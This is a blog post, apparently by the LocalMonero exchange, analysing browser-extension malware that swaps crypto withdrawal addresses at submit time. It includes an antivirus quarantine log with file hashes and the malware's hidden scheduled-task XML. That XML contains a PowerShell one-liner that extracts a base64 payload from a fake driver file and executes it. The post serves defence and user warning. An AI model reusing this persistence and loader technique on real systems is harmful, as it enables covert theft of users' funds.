# Malware that replaces the crypto address

Hey everyone,

LocalMonero is constantly on the lookout for new security threats that target our users. Around a week ago a user reported to us that the address that they specified when opening trade wasn’t actually the address to which the coins were sent. Thinking this was a one-time fluke, the user opened another trade only to be faced with the same issue.

After the user got in touch with our support staff, he initially reported it as a bug. Upon examining the situation we asked the user to conduct some tests and record them. It was clear from the recordings provided by the user that we were actually dealing with a very devious form of malware here.

You should watch this video just to see how it works

As you can see, this doesn’t work like the clipboard-replacing malware we’ve all heard about. Instead, this malware actually waits until you hit the submit button before replacing the address in a way that’s hidden from you unless it errors out.

Not only that, it can also be seen from the video that even checking the settlement address on the trade page isn’t effective, as the malware seems to be able to detect the address string and remove it entirely.

### Not a bug

Hearing this our user was surprised to learn that this is malware as opposed to a bug. After all, the user had run a Windows Defender scan and it turned up nothing. Unfortunately, it seems that Windows Defender is inadequate in detecting these threats. After installing and running Malwarebytes, the user reported that the scan did, in fact, turn up quite the rap sheet of malware on their computer:

``````Folder: 10
Trojan.BitCoinMiner.ShrtCln, C:\Users\amer0\AppData\Local\Microsoft\Edge\User Data\Default\Extension\edemncdrmppkbrenlpckdljeffjijbln\3.1.5._0\_metadata\generated_indexed_rulesets, Quarantined, 5865, 1082968, , , , , ,
Trojan.BitCoinMiner.ShrtCln, C:\Users\amer0\AppData\Local\Microsoft\Edge\User Data\Default\Extension\edemncdrmppkbrenlpckdljeffjijbln\3.1.5._0\_metadata, Quarantined, 5865, 1082968, , , , , ,
Trojan.BitCoinMiner.ShrtCln, C:\Users\amer0\AppData\Local\Microsoft\Edge\User Data\Default\Extension\edemncdrmppkbrenlpckdljeffjijbln\3.1.5._0, Quarantined, 5865, 1082968, , , , , ,
Trojan.BitCoinMiner.ShrtCln, C:\USERS\AMER0\APPDATA\LOCAL\MICROSOFT\EDGE\USER DATA\DEFAULT\EXTENSION\EDEMNCDRMPPKBRENLPCKDLJEFFJIJBLN, Quarantined, 5865, 1082968, 1.0.61045, , ame, , ,
Trojan.BitCoinMiner.ShrtCln, C:\Users\amer0\AppData\Local\Google\Chrome\User Data\Default\Extension\lmrccaklojbflleiknqecnqecdlockcq\5.3.7._0, Quarantined, 5865, 1090470, , , , , ,
Trojan.BitCoinMiner.ShrtCln, C:\USERS\AMER0\APPDATA\LOCAL\GOOGLE\CHROME\USER DATA\DEFAULT\EXTENSION\LMRCCAKLOJBFLLEIKNQECNQECDLOCKCQ, Quarantined, 5865, 1090470, 1.0.61045, , ame, , ,
Trojan.BitCoinMiner.ShrtCln, C:\Users\amer0\AppData\Local\Google\Chrome\User Data\Default\Extension\ioibmrbdfjbfeceikoprfmifcdbcbrjq\4.4.6._0, Quarantined, 5865, 1090470, , , , , ,
Trojan.BitCoinMiner.ShrtCln, C:\USERS\AMER0\APPDATA\LOCAL\GOOGLE\CHROME\USER DATA\DEFAULT\EXTENSION\IOIBMRBDFJBFECEIKOPRFMIFCDBCBRJQ, Quarantined, 5865, 1090470, 1.0.61045, , ame, , ,

File: 38
Trojan.BitCoinMiner.ShrtCln, C:\USERS\AMER0\APPDATA\LOCAL\MICROSOFT\EDGE\USER DATA\DEFAULT\EXTENSION\EDEMNCDRMPPKBRENLPCKDLJEFFJIJBLN\3.1.5._0\RULES.JSON, Quarantined, 5865, 1082968, 1.0.61045, , ame, , 4FB6F22DE4F9A3056773E6A39827B547, 1D6845C7B92D6EB70464A35B6075365872C0AE40890133F4D7DD17EA066F8481
Trojan.BitCoinMiner.ShrtCln, C:\Users\amer0\AppData\Local\Microsoft\Edge\User Data\Default\Extension\edemncdrmppkbrenlpckdljeffjijbln\3.1.5._0\128.png, Quarantined, 5865, 1082968, , , , , 913064ADAAA4C4FA2A9D011B66B33183, AFB4CE8882EF7AE80976EBA7D87F6E07FCDDC8E9E84747E8D747D1E996DEA8EB
Trojan.BitCoinMiner.ShrtCln, C:\Users\amer0\AppData\Local\Microsoft\Edge\User Data\Default\Extension\edemncdrmppkbrenlpckdljeffjijbln\3.1.5._0\content.bootstrap.js, Quarantined, 5865, 1082968, , , , , 3043702D6B23363443A9DF78407B90F8, 709AC591BE1095E61721F49A9F2007F2A278F359DD3EA65CBB6712A2AE6B10D9
Trojan.BitCoinMiner.ShrtCln, C:\Users\amer0\AppData\Local\Microsoft\Edge\User Data\Default\Extension\edemncdrmppkbrenlpckdljeffjijbln\3.1.5._0\manifest.json, Quarantined, 5865, 1082968, , , , , 59CF96C6B5C8C1FDDF2071B912A7EBE4, 0DE9A23F88B9B7BDA3DA989DCE7AD014112D88100DCEAABCA072D6672522BE26
Trojan.BitCoinMiner.ShrtCln, C:\Users\amer0\AppData\Local\Microsoft\Edge\User Data\Default\Extension\edemncdrmppkbrenlpckdljeffjijbln\3.1.5._0\webpack_block.js, Quarantined, 5865, 1082968, , , , , 905BF935A59B868AA2A2D86442FA024B, D57FF2FCE1CFFA6AC756532EA611AF4E13933D881D4F5C9352B3431E9404F2BF
Trojan.BitCoinMiner.ShrtCln, C:\Users\amer0\AppData\Local\Microsoft\Edge\User Data\Default\Extension\edemncdrmppkbrenlpckdljeffjijbln\3.1.5._0\webpack_bnb.js, Quarantined, 5865, 1082968, , , , , 08F76203288898B57B3D02002874FEA0, D8709E509979ECE386EA7DD03FD5E7685E13112A60636A0226B9F1C5A52FDE74
Trojan.BitCoinMiner.ShrtCln, C:\Users\amer0\AppData\Local\Microsoft\Edge\User Data\Default\Extension\edemncdrmppkbrenlpckdljeffjijbln\3.1.5._0\webpack_cb.js, Quarantined, 5865, 1082968, , , , , FB6445E9B952DE39AE379FD090966771, 5DF3AAFD6B3112751E009000F4F047F1D2CB1B3E7314C2EFC2A281440FD96FFD
Trojan.BitCoinMiner.ShrtCln, C:\Users\amer0\AppData\Local\Microsoft\Edge\User Data\Default\Extension\edemncdrmppkbrenlpckdljeffjijbln\3.1.5._0\webpack_common.js, Quarantined, 5865, 1082968, , , , , 75E22F62323EF31E43D129C084625F5F, 993E6E0D04542B473306BCE2E283555307573E006460F351ACCE8E5F3A275B34
Trojan.BitCoinMiner.ShrtCln, C:\Users\amer0\AppData\Local\Microsoft\Edge\User Data\Default\Extension\edemncdrmppkbrenlpckdljeffjijbln\3.1.5._0\webpack_content.js, Quarantined, 5865, 1082968, , , , , BFCF8ED960A918CF0CC8E8EE6CE97F6C, 460626F70555523D2FE223A19E419D120E39F89694D62058E2C8B716B7A1CE76
Trojan.BitCoinMiner.ShrtCln, C:\Users\amer0\AppData\Local\Microsoft\Edge\User Data\Default\Extension\edemncdrmppkbrenlpckdljeffjijbln\3.1.5._0\webpack_gt.js, Quarantined, 5865, 1082968, , , , , 2AAF609E45C4D99AED5A34D9DCBC9422, C0637893B1F6C2595ADF26D0AFF84544D4F46313243F3D24E6D7CDE89BEDA126
Trojan.BitCoinMiner.ShrtCln, C:\Users\amer0\AppData\Local\Microsoft\Edge\User Data\Default\Extension\edemncdrmppkbrenlpckdljeffjijbln\3.1.5._0\webpack_kuc.js, Quarantined, 5865, 1082968, , , , , 620624B8DC850793F37E1EA491935C5E, 78A6DDB94911677B07441FB3E4D951CDBF6C5F36D528D1111610EF86B69B920B
Trojan.BitCoinMiner.ShrtCln, C:\USERS\AMER0\APPDATA\LOCAL\GOOGLE\CHROME\USER DATA\DEFAULT\EXTENSION\LMRCCAKLOJBFLLEIKNQECNQECDLOCKCQ\5.3.7._0\RULES.JSON, Quarantined, 5865, 1090470, 1.0.61045, , ame, , 4FB6F22DE4F9A3056773E6A39827B547, 1D6845C7B92D6EB70464A35B6075365872C0AE40890133F4D7DD17EA066F8481
Trojan.BitCoinMiner.ShrtCln, C:\Users\amer0\AppData\Local\Google\Chrome\User Data\Default\Extension\lmrccaklojbflleiknqecnqecdlockcq\5.3.7._0\128.png, Quarantined, 5865, 1090470, , , , , 913064ADAAA4C4FA2A9D011B66B33183, AFB4CE8882EF7AE80976EBA7D87F6E07FCDDC8E9E84747E8D747D1E996DEA8EB
Trojan.BitCoinMiner.ShrtCln, C:\Users\amer0\AppData\Local\Google\Chrome\User Data\Default\Extension\lmrccaklojbflleiknqecnqecdlockcq\5.3.7._0\content.bootstrap.js, Quarantined, 5865, 1090470, , , , , 3043702D6B23363443A9DF78407B90F8, 709AC591BE1095E61721F49A9F2007F2A278F359DD3EA65CBB6712A2AE6B10D9
Trojan.BitCoinMiner.ShrtCln, C:\Users\amer0\AppData\Local\Google\Chrome\User Data\Default\Extension\lmrccaklojbflleiknqecnqecdlockcq\5.3.7._0\manifest.json, Quarantined, 5865, 1090470, , , , , 59CF96C6B5C8C1FDDF2071B912A7EBE4, 0DE9A23F88B9B7BDA3DA989DCE7AD014112D88100DCEAABCA072D6672522BE26
Trojan.BitCoinMiner.ShrtCln, C:\Users\amer0\AppData\Local\Google\Chrome\User Data\Default\Extension\lmrccaklojbflleiknqecnqecdlockcq\5.3.7._0\webpack_block.js, Quarantined, 5865, 1090470, , , , , 905BF935A59B868AA2A2D86442FA024B, D57FF2FCE1CFFA6AC756532EA611AF4E13933D881D4F5C9352B3431E9404F2BF
Trojan.BitCoinMiner.ShrtCln, C:\Users\amer0\AppData\Local\Google\Chrome\User Data\Default\Extension\lmrccaklojbflleiknqecnqecdlockcq\5.3.7._0\webpack_bnb.js, Quarantined, 5865, 1090470, , , , , 08F76203288898B57B3D02002874FEA0, D8709E509979ECE386EA7DD03FD5E7685E13112A60636A0226B9F1C5A52FDE74
Trojan.BitCoinMiner.ShrtCln, C:\Users\amer0\AppData\Local\Google\Chrome\User Data\Default\Extension\lmrccaklojbflleiknqecnqecdlockcq\5.3.7._0\webpack_cb.js, Quarantined, 5865, 1090470, , , , , FB6445E9B952DE39AE379FD090966771, 5DF3AAFD6B3112751E009000F4F047F1D2CB1B3E7314C2EFC2A281440FD96FFD
Trojan.BitCoinMiner.ShrtCln, C:\Users\amer0\AppData\Local\Google\Chrome\User Data\Default\Extension\lmrccaklojbflleiknqecnqecdlockcq\5.3.7._0\webpack_common.js, Quarantined, 5865, 1090470, , , , , 75E22F62323EF31E43D129C084625F5F, 993E6E0D04542B473306BCE2E283555307573E006460F351ACCE8E5F3A275B34
Trojan.BitCoinMiner.ShrtCln, C:\Users\amer0\AppData\Local\Google\Chrome\User Data\Default\Extension\lmrccaklojbflleiknqecnqecdlockcq\5.3.7._0\webpack_content.js, Quarantined, 5865, 1090470, , , , , BFCF8ED960A918CF0CC8E8EE6CE97F6C, 460626F70555523D2FE223A19E419D120E39F89694D62058E2C8B716B7A1CE76
Trojan.BitCoinMiner.ShrtCln, C:\Users\amer0\AppData\Local\Google\Chrome\User Data\Default\Extension\lmrccaklojbflleiknqecnqecdlockcq\5.3.7._0\webpack_gt.js, Quarantined, 5865, 1090470, , , , , 2AAF609E45C4D99AED5A34D9DCBC9422, C0637893B1F6C2595ADF26D0AFF84544D4F46313243F3D24E6D7CDE89BEDA126
Trojan.BitCoinMiner.ShrtCln, C:\Users\amer0\AppData\Local\Google\Chrome\User Data\Default\Extension\lmrccaklojbflleiknqecnqecdlockcq\5.3.7._0\webpack_kuc.js, Quarantined, 5865, 1090470, , , , , 620624B8DC850793F37E1EA491935C5E, 78A6DDB94911677B07441FB3E4D951CDBF6C5F36D528D1111610EF86B69B920B
Trojan.BitCoinStealer, C:\WINDOWS\SYSTEM32\DRIVERS\QOTOP6\4F0F6187-8D3A-4D9B-8848-E25921799F33.SYS, Quarantined, 3900, 1055561, 1.0.61045, , ame, , 842BB565271B118499304C2CCB07DD28, 8A59A9259522FF2FA06B5F01860862C0D200D8ECEB228E39855FB7C3ACF5D3EF
Trojan.BitCoinMiner.ShrtCln, C:\USERS\AMER0\APPDATA\LOCAL\GOOGLE\CHROME\USER DATA\DEFAULT\EXTENSION\IOIBMRBDFJBFECEIKOPRFMIFCDBCBRJQ\4.4.6._0\RULES.JSON, Quarantined, 5865, 1090470, 1.0.61045, , ame, , 4FB6F22DE4F9A3056773E6A39827B547, 1D6845C7B92D6EB70464A35B6075365872C0AE40890133F4D7DD17EA066F8481
Trojan.BitCoinMiner.ShrtCln, C:\Users\amer0\AppData\Local\Google\Chrome\User Data\Default\Extension\ioibmrbdfjbfeceikoprfmifcdbcbrjq\4.4.6._0\128.png, Quarantined, 5865, 1090470, , , , , 913064ADAAA4C4FA2A9D011B66B33183, AFB4CE8882EF7AE80976EBA7D87F6E07FCDDC8E9E84747E8D747D1E996DEA8EB
Trojan.BitCoinMiner.ShrtCln, C:\Users\amer0\AppData\Local\Google\Chrome\User Data\Default\Extension\ioibmrbdfjbfeceikoprfmifcdbcbrjq\4.4.6._0\content.bootstrap.js, Quarantined, 5865, 1090470, , , , , 3043702D6B23363443A9DF78407B90F8, 709AC591BE1095E61721F49A9F2007F2A278F359DD3EA65CBB6712A2AE6B10D9
Trojan.BitCoinMiner.ShrtCln, C:\Users\amer0\AppData\Local\Google\Chrome\User Data\Default\Extension\ioibmrbdfjbfeceikoprfmifcdbcbrjq\4.4.6._0\manifest.json, Quarantined, 5865, 1090470, , , , , 59CF96C6B5C8C1FDDF2071B912A7EBE4, 0DE9A23F88B9B7BDA3DA989DCE7AD014112D88100DCEAABCA072D6672522BE26
Trojan.BitCoinMiner.ShrtCln, C:\Users\amer0\AppData\Local\Google\Chrome\User Data\Default\Extension\ioibmrbdfjbfeceikoprfmifcdbcbrjq\4.4.6._0\webpack_block.js, Quarantined, 5865, 1090470, , , , , 905BF935A59B868AA2A2D86442FA024B, D57FF2FCE1CFFA6AC756532EA611AF4E13933D881D4F5C9352B3431E9404F2BF
Trojan.BitCoinMiner.ShrtCln, C:\Users\amer0\AppData\Local\Google\Chrome\User Data\Default\Extension\ioibmrbdfjbfeceikoprfmifcdbcbrjq\4.4.6._0\webpack_bnb.js, Quarantined, 5865, 1090470, , , , , 08F76203288898B57B3D02002874FEA0, D8709E509979ECE386EA7DD03FD5E7685E13112A60636A0226B9F1C5A52FDE74
Trojan.BitCoinMiner.ShrtCln, C:\Users\amer0\AppData\Local\Google\Chrome\User Data\Default\Extension\ioibmrbdfjbfeceikoprfmifcdbcbrjq\4.4.6._0\webpack_cb.js, Quarantined, 5865, 1090470, , , , , FB6445E9B952DE39AE379FD090966771, 5DF3AAFD6B3112751E009000F4F047F1D2CB1B3E7314C2EFC2A281440FD96FFD
Trojan.BitCoinMiner.ShrtCln, C:\Users\amer0\AppData\Local\Google\Chrome\User Data\Default\Extension\ioibmrbdfjbfeceikoprfmifcdbcbrjq\4.4.6._0\webpack_common.js, Quarantined, 5865, 1090470, , , , , 75E22F62323EF31E43D129C084625F5F, 993E6E0D04542B473306BCE2E283555307573E006460F351ACCE8E5F3A275B34
Trojan.BitCoinMiner.ShrtCln, C:\Users\amer0\AppData\Local\Google\Chrome\User Data\Default\Extension\ioibmrbdfjbfeceikoprfmifcdbcbrjq\4.4.6._0\webpack_content.js, Quarantined, 5865, 1090470, , , , , BFCF8ED960A918CF0CC8E8EE6CE97F6C, 460626F70555523D2FE223A19E419D120E39F89694D62058E2C8B716B7A1CE76
Trojan.BitCoinMiner.ShrtCln, C:\Users\amer0\AppData\Local\Google\Chrome\User Data\Default\Extension\ioibmrbdfjbfeceikoprfmifcdbcbrjq\4.4.6._0\webpack_gt.js, Quarantined, 5865, 1090470, , , , , 2AAF609E45C4D99AED5A34D9DCBC9422, C0637893B1F6C2595ADF26D0AFF84544D4F46313243F3D24E6D7CDE89BEDA126
Trojan.BitCoinMiner.ShrtCln, C:\Users\amer0\AppData\Local\Google\Chrome\User Data\Default\Extension\ioibmrbdfjbfeceikoprfmifcdbcbrjq\4.4.6._0\webpack_kuc.js, Quarantined, 5865, 1090470, , , , , 620624B8DC850793F37E1EA491935C5E, 78A6DDB94911677B07441FB3E4D951CDBF6C5F36D528D1111610EF86B69B920B
Trojan.BitCoinMiner.E, C:\WINDOWS\SYSTEM32\TASKS\Microsoft\Windows\Management\Provisioning\User, Quarantined, 3659, 1090462, 1.0.61045, , ame, , 934E89A3A99C184F1798775D4BE62CD4, D11427934919F664C3F27DF0E2DAECF71E1667BA6EA46D048832476C09B8F273
``````

As you can see, there are a bunch of Chrome and Edge (which are both derived from Chromium) browser extension files that are marked as Trojans, albeit `BitcoinMiner` as opposed to the `BitcoinStealer` system32 file. Don’t be fooled by that, though. While it’s true that antivirus software often labels harmless crypto software as malicious, in this particular case we weren’t actually dealing with a legitimate mining extension but a malicious stealing one instead. The user had never installed any mining or crypto-related extensions.

### How did we get here?

After conducting some more tests, and decompiling the sys32 file, we seemed to have figured out that the sys32 file was a vbscript file. We later discovered a malicious Windows system task that was designed to run that file:

``````<?xml version="1.0" encoding="UTF-16"?>
<RegistrationInfo>
<Description>Internet, Health</Description>
<URI>\Microsoft\Windows\Management\Provisioning\dBt3Z\AA7B6A15-FAC1-44D8-8B31-AEF280473975</URI>
</RegistrationInfo>
<Triggers>
<BootTrigger>
<Enabled>true</Enabled>
<Delay>PT59M</Delay>
</BootTrigger>
<RegistrationTrigger>
<Enabled>true</Enabled>
<Delay>PT59M</Delay>
</RegistrationTrigger>
</Triggers>
<Principals>
<Principal id="Author">
<RunLevel>HighestAvailable</RunLevel>
<UserId>AA-SURFACE\amer0</UserId>
<LogonType>InteractiveToken</LogonType>
</Principal>
</Principals>
<Settings>
<MultipleInstancesPolicy>Parallel</MultipleInstancesPolicy>
<DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>
<StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>
<RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>
<IdleSettings>
<StopOnIdleEnd>false</StopOnIdleEnd>
<RestartOnIdle>false</RestartOnIdle>
</IdleSettings>
<Enabled>true</Enabled>
<Hidden>true</Hidden>
<RunOnlyIfIdle>false</RunOnlyIfIdle>
<WakeToRun>true</WakeToRun>
<ExecutionTimeLimit>PT0S</ExecutionTimeLimit>
<Priority>1</Priority>
</Settings>
<Actions Context="Author">
<Exec>
<Command>wscript.exe</Command>
<Arguments>/e:vbscript /b "C:\Windows\System32\zYYdBt3ZQs\4AA2C936-A6E9-4413-9AA4-72BE7EF9CFC4" "n; \$sc = [System.Text.Encoding]::UTF8.GetString([System.IO.File]::ReadAllBytes('C:\Windows\System32\drivers\QoToP6\4F0F6187-8D3A-4D9B-8848-E25921799F33.sys'), 2183100, 422); \$sc2 = [Convert]::FromBase64String(\$sc); \$sc3 = [System.Text.Encoding]::UTF8.GetString(\$sc2); Invoke-Command ([Scriptblock]::Create(\$sc3))"</Arguments>
</Exec>
</Actions>
``````

And running that file seems to install the extensions on your Chromium-based browsers. Firefox-based browsers seem to be not affected by this. We figured this out when we were testing if the malware replaced the address in the Tor Browser (based on Firefox) too. It didn’t, and no malicious extensions seem to have been present in the Tor browser. However, this is simply because the malware doesn’t contain any Firefox extension, as opposed to some built-in Firefox security feature. This is an important distinction to make since Firefox is widely considered to be a secure browser by the general public despite being way behind Chromium in security according to some of the most prominent security researchers in the industry.

(As a side note, something like Ungoogled Chromium seems to be the best security/privacy desktop browser solution out there at this time.)

### NoJS saves the day

During our tests to figure out the scope and MO of the malware, we managed to figure out that if you had our website running in NoJS mode you’d be safe from the effects of this particular malware despite having your browser compromised by the extension. When the user attempted to open the trade using the NoJS version of our site from the infected Chrome browser the malware was unable to replace the address. This isn’t to say that NoJS would save you against all potential threats, but it certainly massively reduces the attack surface.

### What do I need to look for?

Check out how the malicious extension looked like in the user’s browser:

How the extension looks like (just an image, safe to click)

Extension permissions (just an image, safe to click)

Basically, the extension disguised itself as a Google Sheets extension. Pretty sneaky, like an Ork painted in purple. The dead giveaway, in this case, can be found in the extension permissions. Notice that it wants access to all sites and to block content on a page.

### Conclusion

Malware sucks. It’s easy to get and hard to get rid of. Keep your internet habits clean. Never open unknown links and never trust unknown files. When using LocalMonero, try sticking to NoJS mode for maximum security.

Stay safe!

P.S. We have the malware files quarantined, but we won’t be publishing the link to download the malware here to prevent accidental infections. If there are any security researchers who wish to dissect them please PM me and we’ll send you the link.